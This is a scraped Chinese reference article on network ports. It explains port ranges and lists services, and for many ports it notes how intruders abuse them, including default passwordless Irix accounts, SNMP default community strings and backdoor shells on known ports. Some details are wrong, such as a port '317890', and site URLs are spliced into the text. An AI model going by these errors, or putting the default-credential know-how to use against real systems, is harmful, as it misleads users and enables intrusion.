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计算机端口详解与常见端口入侵方法

计算机端口详解与常见端口入侵方法
计算机端口详解与常见端口入侵方法

计算机“端口”是英文port的义译,可以认为是计算机与外界通讯交流的出口。其中硬件领域的端口又称接口,如:USB端口、串行端口等。软件领域的端口一般指网络中面向连接服务和无连接服务的通信协议端口,是一种抽象的软件结构,包括一些数据结构和I/O(基本输入输出)缓冲区。

可以先了解面向连接和无连接协议(Connection-Oriented and Connectionless Protocols)

面向连接服务的主要特点有:面向连接服务要经过三个阶段:数据传数前,先建立连接,连接建立后再传输数据,数据传送完后,释放连接。面向连接服务,可确保数据传送的次序和传输的可靠性https://www.doczj.com/doc/1d14961343.html,无连接服务的特点是:无连接服务只有传输数据阶段。消除了除数据通信外的其它开销。只要发送实体是活跃的,无须接收实体也是活跃的。它的优点是灵活方便、迅速,特别适合于传送少量零星的报文,但无连接服务不能防止报文的丢失、重复或失序。

区分“面向连接服务”和“无连接服务”的概念,特别简单、形象的例子是:打电话和写信。两个人如果要通电话,必须先建立连接——拨号,等待应答后才能相互传递信息,最后还要释放连接——挂电话。写信就没有那么复杂了,地址姓名填好以后直接往邮筒一扔,收信人就能收到。TCP/IP协议在网络层是无连接的(数据包只管往网上发,如何传输和到达以及是否到达由网络设备来管理)。而“端口”,是传输层的内容,是面向连接的。协议里面低于1024的端口都有确切的定义,它们对应着因特网上常见的一些服务。这些常见的服务可以划分为使用TCP端口(面向连接如打电话)和使用UDP端口(无连接如写信)两种。

网络中可以被命名和寻址的通信端口是操作系统的一种可分配资源。由网络OSI(开放系统互联参考模型,Open System Interconnection Reference Model)七层协议可知,传输层与网络层最大的区别是传输层提供进程通信能力,网络通信的最终地址不仅包括主机地址,还包括可描述进程的某种标识。所以TCP/IP协议提出的协议端口,可以认为是网络通信进程的一种标识符https://www.doczj.com/doc/1d14961343.html,

应用程序(调入内存运行后一般称为:进程)通过系统调用与某端口建立连接(binding,绑定)后,传输层传给该端口的数据都被相应的进程所接收,相应进程发给传输层的数据都从该端口输出。在TCP/IP协议的实现中,端口操作类似于一般的I/O操作,进程获取一个端口,相当于获取本地唯一的I/O文件,可以用一般的读写方式访问https://www.doczj.com/doc/1d14961343.html, 类似于文件描述符,每个端口都拥有一个叫端口号的整数描述符,用来区别不同的端口。由于TCP/IP传输层的TCP和UDP两个协议是两个完全独立的软件模块,因此各自的端口号也相互独立。如TCP有一个255号端口,UDP也可以有一个255号端口,两者并不冲突https://www.doczj.com/doc/1d14961343.html,

端口号有两种基本分配方式:第一种叫全局分配这是一种集中分配方式,由一个公认权威的中央机构根据用户需要进行统一分配,并将结果公布于众,第二种是本地分配,又称动态连接,即进程需要访问传输层服务时,向本地操作系统提出申请,操作系统返回本地唯一的端口号,进程再通过合适的系统调用,将自己和该端口连接起来(binding,绑定)。TCP/IP 端口号的分配综合了以上两种方式,将端口号分为两部分,少量的作为保留端口,以全局方式分配给服务进程。每一个标准服务器都拥有一个全局公认的端口叫周知口,即使在不同的机器上,其端口号也相同。剩余的为自由端口,以本地方式进行分配。TCP和UDP规定,小于256的端口才能作为保留端口。

按端口号可分为3大类:

(1)公认端口(Well Known Ports):从0到1023,它们紧密绑定(binding)于一些服务。通常这些端口的通讯明确表明了某种服务的协议。例如:80端口实际上总是HTTP通讯。(2)注册端口(Registered Ports):从1024到49151。它们松散地绑定于一些服务。也

就是说有许多服务绑定于这些端口,这些端口同样用于许多其它目的。例如:许多系统处理动态端口从1024左右开始。

(3)动态和/或私有端口(Dynamic and/or Private Ports):从49152到65535。理论上,不应为服务分配这些端口。实际上,机器通常从1024起分配动态端口。但也有例外:SUN 的RPC端口从32768开始。

系统管理员可以“重定向”端口:

一种常见的技术是把一个端口重定向到另一个地址。例如默认的HTTP端口是80,不少人将它重定向到另一个端口,如8080。如果是这样改了,要访问本文就应改用这个地址https://www.doczj.com/doc/1d14961343.html,:8080/net/port.htm(当然,这仅仅是理论上的举例)

https://www.doczj.com/doc/1d14961343.html,实现重定向是为了隐藏公认的默认端口,降低受破坏率。这样如果有人要对一个公认的默认端口进行攻击则必须先进行端口扫描。大多数端口重定向与原端口有相似之处,例如多数HTTP端口由80变化而来:81,88,8000,8080,8888。同样POP的端口原来在110,也常被重定向到1100。也有不少情况是选取统计上有特别意义的数,象1234,23456,34567等。许多人有其它原因选择奇怪的数,42,69,666,31337。近来,越来越多的远程控制木马( Remote Access Trojans, RATs )采用相同的默认端口。如NetBus的默认端口是12345。Blake R. Swopes指出使用重定向端口还有一个原因,在UNIX系统上,如果你想侦听1024以下的端口需要有root权限。如果你没有root权限而又想开web服务,你就需要将其安装在较高的端口。此外,一些ISP的防火墙将阻挡低端口的通讯,这样的话即使你拥有整个机器你还是得重定向端口。

网络端口详解

0 通常用于分析操作系统。这一方法能够工作是因为在一些系统中“0”是无效端口,当你试图使用一种通常的闭合端口连接它时将产生不同的结果。一种典型的扫描:使用IP地址为0.0.0.0,设置ACK位并在以太网层广播。

1 tcpmux 这显示有人在寻找SGI Irix机器。Irix是实现tcpmux的主要提供者,缺省情况下tcpmux在这种系统中被打开。Iris机器在发布时含有几个缺省的无密码的帐户,如lp, guest, uucp, nuucp, demos, tutor, diag, EZsetup, OutOfBox, 和4Dgifts。许多管理员安装后忘记删除这些帐户。因此Hacker们在Internet上搜索tcpmux并利用这些帐户。

7 Echo 你能看到许多人们搜索Fraggle放大器时,发送到x.x.x.0和x.x.x.255的信息。常见的一种DoS攻击是echo循环(echo-loop),攻击者伪造从一个机器发送到另一个机器的UDP数据包,而两个机器分别以它们最快的方式回应这些数据包。另一种东西是由DoubleClick在词端口建立的TCP连接。有一种产品叫做“Resonate Global Dispatch”,它与DNS的这一端口连接以确定最近的路由。Harvest/squid cache将从3130端口发送UDP echo:“如果将cache的source_ping on选项打开,它将对原始主机的UDP echo端口回应一个HIT reply。”这将会产生许多这类数据包。

11 sysstat 这是一种UNIX服务,它会列出机器上所有正在运行的进程以及是什么启动了这些进程。这为入侵者提供了许多信息而威胁机器的安全,如暴露已知某些弱点或帐户的程序。这与UNIX系统中“ps”命令的结果相似。再说一遍:ICMP没有端口,ICMP port 11通常是ICMP type=11。

19 chargen 这是一种仅仅发送字符的服务。UDP版本将会在收到UDP包后回应含有垃圾字

符的包。TCP连接时,会发送含有垃圾字符的数据流知道连接关闭。Hacker利用IP欺骗可以发动DoS攻击。伪造两个chargen服务器之间的UDP包。由于服务器企图回应两个服务器之间的无限的往返数据通讯一个chargen和echo将导致服务器过载。同样fraggle DoS攻击向目标地址的这个端口广播一个带有伪造受害者IP的数据包,受害者为了回应这些数据而过载。

21 ftp 最常见的攻击者用于寻找打开“anonymous”的ftp服务器的方法。这些服务器带有可读写的目录。Hackers或Crackers 利用这些服务器作为传送warez (私有程序) 和pr0n(故意拼错词而避免被搜索引擎分类)的节点。

22 ssh PcAnywhere 建立TCP和这一端口的连接可能是为了寻找ssh。这一服务有许多弱点。如果配置成特定的模式,许多使用RSAREF库的版本有不少漏洞。

(建议在其它端口运行ssh)。还应该注意的是ssh工具包带有一个称为make-ssh-known-hosts的程序。它会扫描整个域的ssh主机。你有时会被使用这一程序的人无意中扫描到。UDP(而不是TCP)与另一端的5632端口相连意味着存在搜索pcAnywhere的扫描。5632(十六进制的0x1600)位交换后是0x0016(使进制的22)。

23 Telnet 入侵者在搜索远程登陆UNIX的服务。大多数情况下入侵者扫描这一端口是为了找到机器运行的操作系统。此外使用其它技术,入侵者会找到密码。

25 smtp 攻击者(spammer)寻找SMTP服务器是为了传递他们的spam。入侵者的帐户总被关闭,他们需要拨号连接到高带宽的e-mail服务器上,将简单的信息传递到不同的地址。SMTP服务器(尤其是sendmail)是进入系统的最常用方法之一,因为它们必须完整的暴露于Internet且邮件的路由是复杂的(暴露+复杂=弱点)。

53 DNS Hacker或crackers可能是试图进行区域传递(TCP),欺骗DNS(UDP)或隐藏其它通讯。因此防火墙常常过滤或记录53端口。需要注意的是你常会看到53端口做为UDP源端口。不稳定的防火墙通常允许这种通讯并假设这是对DNS查询的回复。Hacker常使用这种方法穿透防火墙。

67&68 Bootp和DHCP UDP上的Bootp/DHCP:通过DSL和cable-modem的防火墙常会看见大量发送到广播地址255.255.255.255的数据。这些机器在向DHCP服务器请求一个地址分配。Hacker常进入它们分配一个地址把自己作为局部路由器而发起大量的“中间人”(man-in-middle)攻击。客户端向68端口(bootps)广播请求配置,服务器向67端口(bootpc)广播回应请求。这种回应使用广播是因为客户端还不知道可以发送的IP地址。

69 TFTP(UDP) 许多服务器与bootp一起提供这项服务,便于从系统下载启动代码。但是它们常常错误配置而从系统提供任何文件,如密码文件。它们也可用于向系统写入文件。79 finger Hacker用于获得用户信息,查询操作系统,探测已知的缓冲区溢出错误,回应从自己机器到其它机器finger扫描。

80 web站点默认80为服务端口,采用tcp或udp协议。

98 linuxconf 这个程序提供linux boxen的简单管理。通过整合的HTTP服务器在98端口提

供基于Web界面的服务。它已发现有许多安全问题。一些版本setuid root,信任局域网,在/tmp下建立Internet可访问的文件,LANG环境变量有缓冲区溢出。此外因为它包含整合的服务器,许多典型的HTTP漏洞可能存在(缓冲区溢出,历遍目录等)

109 POP2 并不象POP3那样有名,但许多服务器同时提供两种服务(向后兼容)。在同一个服务器上POP3的漏洞在POP2中同样存在。

110 POP3 用于客户端访问服务器端的邮件服务。POP3服务有许多公认的弱点。关于用户名和密码交换缓冲区溢出的弱点至少有20个(这意味着Hacker可以在真正登陆前进入系统)。成功登陆后还有其它缓冲区溢出错误。

111 sunrpc portmap rpcbind Sun RPC PortMapper/RPCBIND。访问portmapper是扫描系统查看允许哪些RPC服务的最早的一步。常见RPC服务有:rpc.mountd, NFS, rpc.statd, rpc.csmd, rpc.ttybd, amd等。入侵者发现了允许的RPC服务将转向提供服务的特定端口测试漏洞。记住一定要记录线路中的daemon, IDS, 或sniffer,你可以发现入侵者正使用什么程序访问以便发现到底发生了什么。

113 Ident auth 这是一个许多机器上运行的协议,用于鉴别TCP连接的用户。使用标准的这种服务可以获得许多机器的信息(会被Hacker利用)。但是它可作为许多服务的记录器,尤其是FTP, POP, IMAP, SMTP和IRC等服务。通常如果有许多客户通过防火墙访问这些服务,你将会看到许多这个端口的连接请求。记住,如果你阻断这个端口客户端会感觉到在防火墙另一边与e-mail服务器的缓慢连接。许多防火墙支持在TCP连接的阻断过程中发回RST,着将回停止这一缓慢的连接。

119 NNTP news 新闻组传输协议,承载USENET通讯。当你链接到诸如:news://comp.security.firewalls/. 的地址时通常使用这个端口。这个端口的连接企图通常是人们在寻找USENET服务器。多数ISP限制只有他们的客户才能访问他们的新闻组服务器。打开新闻组服务器将允许发/读任何人的帖子,访问被限制的新闻组服务器,匿名发帖或发送spam。

135 oc-serv MS RPC end-point mapper Microsoft在这个端口运行DCE RPC end-point mapper 为它的DCOM服务。这与UNIX 111端口的功能很相似。使用DCOM和/或RPC的服务利用机器上的end-point mapper注册它们的位置。远端客户连接到机器时,它们查询end-point mapper找到服务的位置。同样Hacker扫描机器的这个端口是为了找到诸如:这个机器上运行Exchange Server吗?是什么版本?这个端口除了被用来查询服务(如使用epdump)还可以被用于直接攻击。有一些DoS攻击直接针对这个端口。

137 NetBIOS name service nbtstat (UDP) 这是防火墙管理员最常见的信息。

139 NetBIOS File and Print Sharing 通过这个端口进入的连接试图获得NetBIOS/SMB服务。这个协议被用于Windows“文件和打印机共享”和SAMBA。在Internet上共享自己的硬盘是可能是最常见的问题。大量针对这一端口始于1999,后来逐渐变少。2000年又有回升。一些VBS(IE5 VisualBasic Scripting)开始将它们自己拷贝到这个端口,试图在这个端口繁殖。

143 IMAP 和上面POP3的安全问题一样,许多IMAP服务器有缓冲区溢出漏洞运行登陆过程中进入。记住:一种Linux蠕虫(admw0rm)会通过这个端口繁殖,因此许多这个端口的扫描来自不知情的已被感染的用户。当RadHat在他们的Linux发布版本中默认允许IMAP 后,这些漏洞变得流行起来。Morris蠕虫以后这还是第一次广泛传播的蠕虫。这一端口还被用于IMAP2,但并不流行。已有一些报道发现有些0到143端口的攻击源于脚本。

161 SNMP(UDP) 入侵者常探测的端口。SNMP允许远程管理设备。所有配置和运行信息都储存在数据库中,通过SNMP客获得这些信息。许多管理员错误配置将它们暴露于Internet。Crackers将试图使用缺省的密码“public”“private”访问系统。他们可能会试验所有可能的组合。SNMP包可能会被错误的指向你的网络。Windows机器常会因为错误配置将HP JetDirect remote management软件使用SNMP。HP OBJECT IDENTIFIER将收到SNMP包。新版的Win98使用SNMP解析域名,你会看见这种包在子网内广播(cable modem, DSL)查询sysName和其它信息。

162 SNMP trap 可能是由于错误配置

177 xdmcp 许多Hacker通过它访问X-Windows控制台,它同时需要打开6000端口。

513 rwho 可能是从使用cable modem或DSL登陆到的子网中的UNIX机器发出的广播。这些人为Hacker进入他们的系统提供了很有趣的信息。

553 CORBA IIOP (UDP) 如果你使用cable modem或DSL VLAN,你将会看到这个端口的广播。CORBA是一种面向对象的RPC(remote procedure call)系统。Hacker会利用这些信息进入系统。

600 Pcserver backdoor 请查看1524端口。

一些玩script的孩子认为他们通过修改ingreslock和pcserver文件已经完全攻破了系统-- Alan J. Rosenthal.

635 mountd Linux的mountd Bug。这是人们扫描的一个流行的Bug。大多数对这个端口的扫描是基于UDP的,但基于TCP的mountd有所增加(mountd同时运行于两个端口)。记住,mountd可运行于任何端口(到底在哪个端口,需要在端口111做portmap查询),只是Linux 默认为635端口,就象NFS通常运行于2049端口。

1024 许多人问这个端口是干什么的。它是动态端口的开始。许多程序并不在乎用哪个端口连接网络,它们请求操作系统为它们分配“下一个闲置端口”。基于这一点分配从端口1024开始。这意味着第一个向系统请求分配动态端口的程序将被分配端口1024。为了验证这一点,你可以重启机器,打开Telnet,再打开一个窗口运行“natstat -a”,你将会看到Telnet被分配1024端口。请求的程序越多,动态端口也越多。操作系统分配的端口将逐渐变大。再来一遍,当你浏览Web页时用“netstat”查看,每个Web页需要一个新端口。

1025,1026 参见1024

1080 SOCKS 这一协议以管道方式穿过防火墙,允许防火墙后面的许多人通过一个IP地址

访问Internet。理论上它应该只允许内部的通信向外达到Internet。但是由于错误的配置,它会允许Hacker/Cracker的位于防火墙外部的攻击穿过防火墙。或者简单地回应位于Internet 上的计算机,从而掩饰他们对你的直接攻击。WinGate是一种常见的Windows个人防火墙,常会发生上述的错误配置。在加入IRC聊天室时常会看到这种情况。

1114 SQL 系统本身很少扫描这个端口,但常常是sscan脚本的一部分。

1243 Sub-7木马(TCP)

1524 ingreslock 后门许多攻击脚本将安装一个后门Shell于这个端口(尤其是那些针对Sun 系统中sendmail和RPC服务漏洞的脚本,如statd, ttdbserver和cmsd)。如果你刚刚安装了你的防火墙就看到在这个端口上的连接企图,很可能是上述原因。你可以试试Telnet到你的机器上的这个端口,看看它是否会给你一个Shell。连接到600/pcserver也存在这个问题。

2049 NFS NFS程序常运行于这个端口。通常需要访问portmapper查询这个服务运行于哪个端口,但是大部分情况是安装后NFS运行于这个端口,Hacker/Cracker因而可以闭开portmapper直接测试这个端口。

3128 squid 这是Squid HTTP代理服务器的默认端口。攻击者扫描这个端口是为了搜寻一个代理服务器而匿名访问Internet。你也会看到搜索其它代理服务器的端口:8000/8001/8080/8888。扫描这一端口的另一原因是:用户正在进入聊天室。其它用户(或服务器本身)也会检验这个端口以确定用户的机器是否支持代理。

5632 pcAnywere 你会看到很多这个端口的扫描,这依赖于你所在的位置。当用户打开pcAnywere时,它会自动扫描局域网C类网以寻找可能得代理(译者:指agent而不是proxy)。Hacker/cracker也会寻找开放这种服务的机器,所以应该查看这种扫描的源地址。一些搜寻pcAnywere的扫描常包含端口22的UDP数据包。

6776 Sub-7 artifact 这个端口是从Sub-7主端口分离出来的用于传送数据的端口。例如当控制者通过电话线控制另一台机器,而被控机器挂断时你将会看到这种情况。因此当另一人以此IP拨入时,他们将会看到持续的,在这个端口的连接企图。(译者:即看到防火墙报告这一端口的连接企图时,并不表示你已被Sub-7控制。)

6970 RealAudio RealAudio客户将从服务器的6970-7170的UDP端口接收音频数据流。这是由TCP7070端口外向控制连接设置的。

13223 PowWow PowWow 是Tribal Voice的聊天程序。它允许用户在此端口打开私人聊天的连接。这一程序对于建立连接非常具有“进攻性”。它会“驻扎”在这一TCP端口等待回应。这造成类似心跳间隔的连接企图。如果你是一个拨号用户,从另一个聊天者手中“继承”了IP地址这种情况就会发生:好象很多不同的人在测试这一端口。这一协议使用“OPNG”作为其连接企图的前四个字节。

17027 Conducent 这是一个外向连接。这是由于公司内部有人安装了带有Conducent "adbot" 的共享软件。Conducent "adbot"是为共享软件显示广告服务的。使用这种服务的

一种流行的软件是Pkware。有人试验:阻断这一外向连接不会有任何问题,但是封掉IP地址本身将会导致adbots持续在每秒内试图连接多次而导致连接过载:

机器会不断试图解析DNS名—https://www.doczj.com/doc/1d14961343.html,,即IP地址216.33.210.40 ;

216.33.199.77 ;216.33.199.80 ;216.33.199.81;216.33.210.41。(译者:不知NetAnts 使用的Radiate是否也有这种现象)

27374 Sub-7木马(TCP)

30100 NetSphere木马(TCP) 通常这一端口的扫描是为了寻找中了NetSphere木马。

31337 Back Orifice “elite” Hacker中31337读做“elite”/ei’li:t/(译者:法语,译为中坚力量,精华。即3=E, 1=L, 7=T)。因此许多后门程序运行于这一端口。其中最有名的是Back Orifice。曾经一段时间内这是Internet上最常见的扫描。现在它的流行越来越少,其它的木马程序越来越流行。

31789 Hack-a-tack 这一端口的UDP通讯通常是由于"Hack-a-tack"远程访问木马(RAT, Remote Access Trojan)。这种木马包含内置的31790端口扫描器,因此任何31789端口到317890端口的连接意味着已经有这种入侵。(31789端口是控制连接,317890端口是文件传输连接)

32770~32900 RPC服务 Sun Solaris的RPC服务在这一范围内。详细的说:早期版本的Solaris(2.5.1之前)将portmapper置于这一范围内,即使低端口被防火墙封闭仍然允许Hacker/cracker访问这一端口。扫描这一范围内的端口不是为了寻找portmapper,就是为了寻找可被攻击的已知的RPC服务。

33434~33600 traceroute 如果你看到这一端口范围内的UDP数据包(且只在此范围之内)则可能是由于traceroute。

tcpmux TCP Port Service Multiplexer 传输控制协议端口服务多路开关选择器

2 compressnet Management Utility compressnet 管理实用程序

3 compressnet Compression Process 压缩进程

5 rje Remote Job Entry 远程作业登录

7 echo Echo 回显

9 discard Discard 丢弃

11 systat Active Users 在线用户

13 daytime Daytime 时间

17 qotd Quote of the Day 每日引用

18 msp Message Send Protocol 消息发送协议

19 chargen Character Generator 字符发生器

20 ftp-data File Transfer[Default Data] 文件传输协议(默认数据口)

21 ftp File Transfer[Control] 文件传输协议(控制)

22 ssh SSH Remote Login Protocol SSH远程登录协议

23 telnet Telnet 终端仿真协议

24 any private mail system 预留给个人用邮件系统

25 smtp Simple Mail Transfer 简单邮件发送协议

27 nsw-fe NSW User System FE NSW 用户系统现场工程师

29 msg-icp MSG ICP MSG ICP

31 msg-auth MSG Authentication MSG验证

33 dsp Display Support Protocol 显示支持协议

35 any private printer server 预留给个人打印机服务

37 time Time 时间

38 rap Route Access Protocol 路由访问协议

39 rlp Resource Location Protocol 资源定位协议

41 graphics Graphics 图形

42 nameserver WINS Host Name Server WINS 主机名服务

43 nicname Who Is "绰号" who is服务

44 mpm-flags MPM FLAGS Protocol MPM(消息处理模块)标志协议

45 mpm Message Processing Module [recv] 消息处理模块

46 mpm-snd MPM [default send] 消息处理模块(默认发送口)

47 ni-ftp NI FTP NI FTP

48 auditd Digital Audit Daemon 数码音频后台服务49 tacacs Login Host Protocol (TACACS)TACACS登录主机协议50 re-mail-ck Remote Mail Checking Protocol 远程邮件检查协议[未结束]

51 la-maint IMP Logical Address Maintenance IMP(接口信息处理机)逻辑地址维护

52 xns-time XNS Time Protocol 施乐网络服务系统时间协议

53 domain Domain Name Server 域名服务器

54 xns-ch XNS Clearinghouse 施乐网络服务系统票据交换 55 isi-gl ISI Graphics Language ISI图形语言

56 xns-auth XNS Authentication 施乐网络服务系统验证

57 ? any private terminal access 预留个人用终端访问

58 xns-mail XNS Mail 施乐网络服务系统邮件

59 any private file service 预留个人文件服务

60 Unassigned 未定义

61 ni-mail NI MAIL NI邮件?

62 acas ACA Services 异步通讯适配器服务

63 whois+ whois+ WHOIS+

64 covia Communications Integrator (CI) 通讯接口

65 tacacs-ds TACACS-Database Service TACACS数据库服务

66 sql*net Oracle SQL*NET Oracle SQL*NET

67 bootps Bootstrap Protocol Server 引导程序协议服务端

68 bootpc Bootstrap Protocol Client 引导程序协议客户端

69 tftp Trivial File Transfer 小型文件传输协议

70 gopher Gopher 信息检索协议

71 netrjs-1 Remote Job Service 远程作业服务

72 netrjs-2 Remote Job Service 远程作业服务

73 netrjs-3 Remote Job Service 远程作业服务

74 netrjs-4 Remote Job Service 远程作业服务

75 any private dial out service 预留给个人拨出服务

76 deos Distributed External Object Store 分布式外部对象存储

77 any private RJE service 预留给个人远程作业输入服务

78 vettcp vettcp 修正TCP?

79 finger Finger 查询远程主机在线用户等信息

80 http World Wide Web HTTP 全球信息网超文本传输协议 81 hosts2-ns HOSTS2 Name Server HOST2名称服务

82 xfer XFER Utility 传输实用程序

83 mit-ml-dev MIT ML Device 模块化智能终端ML设备

84 ctf Common Trace Facility 公用追踪设备

85 mit-ml-dev MIT ML Device 模块化智能终端ML设备

86 mfcobol Micro Focus Cobol Micro Focus Cobol编程语言

87 any private terminal link 预留给个人终端连接

88 kerberos Kerberos Kerberros安全认证系统

89 su-mit-tg SU/MIT Telnet Gateway SU/MIT终端仿真网关

90 dnsix DNSIX Securit Attribute Token Map DNSIX 安全属性标记图91 mit-dov MIT Dover Spooler MIT Dover假脱机

92 npp Network Printing Protocol 网络打印协议

93 dcp Device Control Protocol 设备控制协议

94 objcall Tivoli Object Dispatcher Tivoli对象调度

95 supdup SUPDUP

96 dixie DIXIE Protocol Specification DIXIE协议规范

97 swift-rvf(Swift Remote Virtural File Protocol)快速远程虚拟文件协议98 tacnews TAC News TAC新闻协议

99 metagram Metagram Relay

100 newacct [unauthorized use]

101=NIC Host Name Server

102=ISO-TSAP

103=Genesis Point-to-Point Trans Net

104=ACR-NEMA Digital Imag. & Comm. 300

105=Mailbox Name Nameserver

106=3COM-TSMUX3com-tsmux

107=Remote Telnet Service

108=SNA Gateway Access Server

109=Post Office Protocol - Version 2

110=Post Office Protocol - Version 3

111=SUN RPC

112=McIDAS Data Transmission Protocol

113=Authentication Service

114=Audio News Multicast

115=Simple File Transfer Protocol

116=ANSA REX Notify

117=UUCP Path Service

118=SQL Servicessqlserv

119=Network News Transfer Protocol

120=CFDPTKTcfdptkt

121=Encore Expedited Remote Pro.Call 122=SMAKYNETsmakynet

123=Network Time Protocol

124=ANSA REX Trader

125=Locus PC-Interface Net Map Ser 126=Unisys Unitary Login

127=Locus PC-Interface Conn Server 128=GSS X License Verification

129=Password Generator Protocol

130=cisco FNATIVE

131=cisco TNATIVE

132=cisco SYSMAINT

133=Statistics Service

134=INGRES-NET Service

135=Location Service

136=PROFILE Naming System

137=NETBIOS Name Service

138=NETBIOS Datagram Service

139=NETBIOS Session Service

140=EMFIS Data Service

141=EMFIS Control Service

142=Britton-Lee IDM

143=Interim Mail Access Protocol v2 144=NewSnews

145=UAAC Protocoluaac

146=ISO-IP0iso-tp0

147=ISO-IPiso-ip

148=CRONUS-SUPPORT

149=AED 512 Emulation Service

150=SQL-NETsql-net

151=HEMShems

152=Background File Transfer Program 153=SGMPsgmp

154=NETSCnetsc-prod

155=NETSCnetsc-dev

156=SQL Service

157=KNET/VM Command/Message Protocol 158=PCMail Serverpcmail-srv

159=NSS-Routingnss-routing

160=SGMP-TRAPSsgmp-traps

161=SNMP

162=SNMP TRAP

163=CMIP/TCP Manager

164=CMIP/TCP Agent

165=Xeroxxns-courier

166=Sirius Systems

167=NAMPnamp

168=RSVDrsvd

169=Send

170=Network PostScript

170=Network PostScript

171=Network Innovations Multiplex

172=Network Innovations CL/1

173=Xyplexxyplex-mux

174=MAILQ

175=VMNET

176=GENRAD-MUXgenrad-mux

177=X Display Manager Control Protocol 178=NextStep Window Server

179=Border Gateway Protocol

180=Intergraphris

181=Unifyunify

182=Unisys Audit SITP

183=OCBinderocbinder

184=OCServerocserver

185=Remote-KIS

186=KIS Protocolkis

187=Application Communication Interface 188=Plus Five

401=Uninterruptible Power Supply

402=Genie Protocol

403=decapdecap

404=ncednced

405=ncldncld

406=Interactive Mail Support Protocol 407=Timbuktutimbuktu

408=Prospero Resource Manager Sys. Man. 409=Prospero Resource Manager Node Man. 410=DECLadebug Remote Debug Protocol 411=Remote MT Protocol

412=Trap Convention Port

413=SMSPsmsp

414=InfoSeekinfoseek

415=BNetbnet

416=Silverplattersilverplatter

417=Onmuxonmux

418=Hyper-Ghyper-g

419=Arielariel1

420=SMPTEsmpte

421=Arielariel2

422=Arielariel3

423=IBM Operations Planning and Control Start 424=IBM Operations Planning and Control Track 425=ICADicad-el

426=smartsdpsmartsdp

427=Server Location

429=OCS_AMU

430=UTMPSDutmpsd

431=UTMPCDutmpcd

432=IASDiasd

433=NNSPnnsp

434=MobileIP-Agent

435=MobilIP-MN

436=DNA-CMLdna-cml

437=comscmcomscm

439=dasp, Thomas Obermair

440=sgcpsgcp

441=decvms-sysmgtdecvms-sysmgt

442=cvc_hostdcvc_hostd

443=https

444=Simple Network Paging Protocol

445=Microsoft-DS

446=DDM-RDBddm-rdb

447=DDM-RFMddm-dfm

448=DDM-BYTEddm-byte

449=AS Server Mapper

450=TServertserver

512=exec, Remote process execution

513=login, remote login

514=cmd, exec with auto auth.

514=syslog

515=Printer spooler

516=Unassigned

517=talk

519=unixtime

520=extended file name server

521=Unassigned

522=Unassigned

523=Unassigned

524=Unassigned

526=newdate

530=rpc courier

531=chatconference

532=readnewsnetnews

533=for emergency broadcasts

539=Apertus Technologies Load Determination 540=uucp

541=uucp-rlogin

542=Unassigned

543=klogin

544=kshell

545=Unassigned

546=Unassigned

547=Unassigned

548=Unassigned

549=Unassigned

550=new-who

551=Unassigned

552=Unassigned

553=Unassigned

554=Unassigned

555=dsf

556=remotefs

557-559=rmonitor

560=rmonitord

561=dmonitor

562=chcmd

563=Unassigned

564=plan 9 file service

565=whoami

566-569 Unassigned

570=demonmeter

571=udemonmeter

572-599 Unassigned ipc server

600=Sun IPC server

607=nqs

606=Cray Unified Resource Manager

608=Sender-Initiated/Unsolicited File Transfer 609=npmp-trapnpmp-trap

610=npmp-localnpmp-local

611=npmp-guinpmp-gui

634=ginadginad

666=Doom Id Software

704=errlog copy/server daemon

709=EntrustManager

729=IBM NetView DM/6000 Server/Client 730=IBM NetView DM/6000 send/tcp

731=IBM NetView DM/6000 receive/tcp

741=netGWnetgw

742=Network based Rev. Cont. Sys.

744=Flexible License Manager

747=Fujitsu Device Control

748=Russell Info Sci Calendar Manager 749=kerberos administration

751=pump

752=qrh

754=send

758=nlogin

759=con

760=ns

762=quotad

763=cycleserv

765=webster

767=phonephonebook

769=vid

771=rtip

772=cycleserv2

774=acmaint_dbd

775=acmaint_transd

780=wpgs

786=Concertconcert

800=mdbs_daemon

996=Central Point Software

997=maitrd

999=puprouter

1023=Reserved

1024=Reserved

1025=network blackjack

1030=BBN IAD

1031=BBN IAD

1032=BBN IAD

1067=Installation Bootstrap Proto. Serv. 1068=Installation Bootstrap Proto. Cli. 1080=SOCKS

1083=Anasoft License Manager

1084=Anasoft License Manager

1155=Network File Access

1222=SNI R&D network

1248=hermes

1346=Alta Analytics License Manager

1347=multi media conferencing

1347=multi media conferencing

1348=multi media conferencing

1349=Registration Network Protocol

1350=Registration Network Protocol

1351=Digital Tool Works (MIT)

1352=/Lotus Notelotusnote

1353=Relief Consulting

1354=RightBrain Software

1355=Intuitive Edge

1356=CuillaMartin Company

1357=Electronic PegBoard

1358=CONNLCLIconnlcli

1359=FTSRVftsrv

1360=MIMERmimer

1361=LinX

1362=TimeFliestimeflies

1363=Network DataMover Requester

1364=Network DataMover Server

1365=Network Software Associates

1366=Novell NetWare Comm Service Platform 1367=DCSdcs

1368=ScreenCastscreencast

1369=GlobalView to Unix Shell

1370=Unix Shell to GlobalView

1371=Fujitsu Config Protocol

1372=Fujitsu Config Protocol

1373=Chromagrafxchromagrafx

1374=EPI Software Systems

1375=Bytexbytex

1376=IBM Person to Person Software

1377=Cichlid License Manager

1378=Elan License Manager

1379=Integrity Solutions

1380=Telesis Network License Manager 1381=Apple Network License Manager

1382=udt_os

1383=GW Hannaway Network License Manager 1384=Objective Solutions License Manager 1385=Atex Publishing License Manager

1387=Computer Aided Design Software Inc LM 1388=Objective Solutions DataBase Cache 1389=Document Manager

1390=Storage Controller

1391=Storage Access Server

1392=Print Managericlpv-pm

1393=Network Log Server

1394=Network Log Client

1395=PC Workstation Manager software

1396=DVL Active Mail

1397=Audio Active Mail

1398=Video Active Mail

1399=Cadkey License Manager

1400=Cadkey Tablet Daemon

1401=Goldleaf License Manager

1402=Prospero Resource Manager

1403=Prospero Resource Manager

1404=Infinite Graphics License Manager 1405=IBM Remote Execution Starter

1406=NetLabs License Manager

1407=DBSA License Manager

1408=Sophia License Manager

1409=Here License Manager

1410=HiQ License Manager

1411=AudioFileaf

1412=InnoSysinnosys

1413=Innosys-ACLinnosys-acl

1414=IBM MQSeriesibm-mqseries

1415=DBStardbstar

1416=Novell LU6.2novell-lu6.2

1417=Timbuktu Service 1 Port

1417=Timbuktu Service 1 Port

1418=Timbuktu Service 2 Port

1419=Timbuktu Service 3 Port

1420=Timbuktu Service 4 Port

1421=Gandalf License Manager

1422=Autodesk License Manager

1423=Essbase Arbor Software

1424=Hybrid Encryption Protocol

1425=Zion Software License Manager

1426=Satellite-data Acquisition System 1 1427=mloadd monitoring tool

1429=Hypercom NMSnms

1430=Hypercom TPDUtpdu

1431=Reverse Gosip Transport

1432=Blueberry Software License Manager

1433=Microsoft-SQL-Server

